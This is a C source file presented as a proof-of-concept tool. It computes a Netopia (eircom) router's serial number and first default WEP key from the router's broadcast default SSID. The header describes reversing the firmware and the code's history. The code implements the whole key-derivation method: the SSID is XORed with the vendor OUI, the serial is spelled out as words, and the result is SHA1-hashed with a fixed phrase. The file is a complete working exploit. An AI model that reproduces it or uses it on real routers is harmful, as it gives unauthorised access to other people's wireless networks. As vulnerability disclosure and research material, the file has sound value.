/*******************************************************************************
*
*
*
*  This is a simple program which displays the serial number and corresponding 
*  WEP key for a Netopia router when supplied with a default SSID.
*
*  The authors cannot accept responsibility for misuse of this software.
*  It is provided only as a proof of concept tool.
*
*  20/03/08 - code cleaned up
*           - now only decodes SSID, displaying first default key.
*           - anyone who wants full source code should look at the GUI version
*           - or Tomas's eirwep code
*
*  30/09/07 - www.pixelbeat.org - added linux support.
*             To compile on unix: gcc dessid.c -l crypto -o dessid
*
*  21/09/07 - removed obsolete stuff, added new SSID routine and technical
*             details of flaw
*
*  20/09/07 - re-write whole program
*  19/09/07 - reversed binaries, first badly written demo
*
*******************************************************************************/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#ifdef linux
  #include <openssl/sha.h>
  #define SHA1Init SHA1_Init
  #define SHA1Update SHA1_Update
  #define SHA1Final(x,y) SHA1_Final(y,x)
  #define SHA1_CTX SHA_CTX
#else
  #include "sha1.h"
  #define SHA1Init SHA1Reset
  #define SHA1Update SHA1Input
  #define SHA1Final SHA1Result
  #define SHA1_CTX SHA1Context
#endif

#define MAX_SSID_OCTETS 8
#define MAX_SERIAL_NUMBER 16
#define DEFAULT_KEY_SIZE 13

typedef unsigned int u32;
typedef unsigned short u16;
typedef unsigned char u8;

const u8 *strDigits[10]={"Zero","One","Two","Three","Four",
                         "Five","Six","Seven","Eight","Nine"};

/*
 *
 *  The serial number is converted to its ascii word format
 *  
 *  e.g "123" becomes "OneTwoThree"
 *
 */
u32 formatSerial(u8 *output, u8 *number) {
  
    u32 len = strlen(number);
    u8 *p;

    if( len > MAX_SERIAL_NUMBER )
      return(0);

    for(p = number;(*p >= '0') && (*p <= '9');p++)
      strcat(output,strDigits[ *p - '0' ]);

    return( strlen(output) );
}

/*
 *
 *  convert the octal SSID to binary
 *
 */
u32 str2ssid(u8 *str) {
    
    u8 *p;
    u32 ssid = 0,len = strlen(str);
    
    if( (len % 2) || (len > MAX_SSID_OCTETS) )
        return(-1);
        
    for(p = str;(*p >= '0') && (*p <= '9');p++)
        ssid = (ssid << 3) + (*p - '0');

    return( ((p - str) == len) ? ssid : -1);
}

/*
 *
 *  generate the first default WEP key for Netopia routers 
 *
 */
u8 *genWepKey(u8 *strKey,u8 *serial) {

    u8 words[256]={0},sha1_digest[20+1]={0};
    SHA1_CTX sha1_ctx;
    u32 len,i;

    if(!(len = formatSerial(words,serial)))
      return("Invalid serial number");

    SHA1Init(&sha1_ctx);
    SHA1Update(&sha1_ctx,words,len);
    SHA1Update(&sha1_ctx,"Although your world wonders me, ",32);
    SHA1Final(&sha1_ctx,sha1_digest);

    for(i = 0;i < DEFAULT_KEY_SIZE;i++)
      sprintf(&strKey[i*2],"%.2x",sha1_digest[i]);

    return(strKey);
}

void usage(char **argv) {
    fprintf(stdout,"\n\tUsage:%s <SSID> with \"eircom\" string omitted.\n"
                    "\n\t e.g: %s 31361731\n",*argv,*argv);
    exit(0);
}

int main(int argc, char **argv) {

    u32 ssid = 0;
    u8 digits[MAX_SERIAL_NUMBER+1]={0};
    u8 strKey[DEFAULT_KEY_SIZE*2]={0};

    if(argc == 2) {

      /* convert the SSID into binary */

      if(( ssid = str2ssid(argv[1])) == -1) usage(argv);

      /*
       * Exclusive-OR the Netopia Inc. OUI ID against the 2nd octet
       * add 0x01000000 because SSID routine only processes 24-bits of serial number
       *
       */

      sprintf(digits,"%ld",( (ssid ^ 0xFCC) + 0x01000000));

      fprintf(stdout,
              "\nWEP key for serial number: %s = %s\n\n",
              digits,genWepKey(strKey,digits));

    }else {
      usage(argv);
    }
    return(0);
}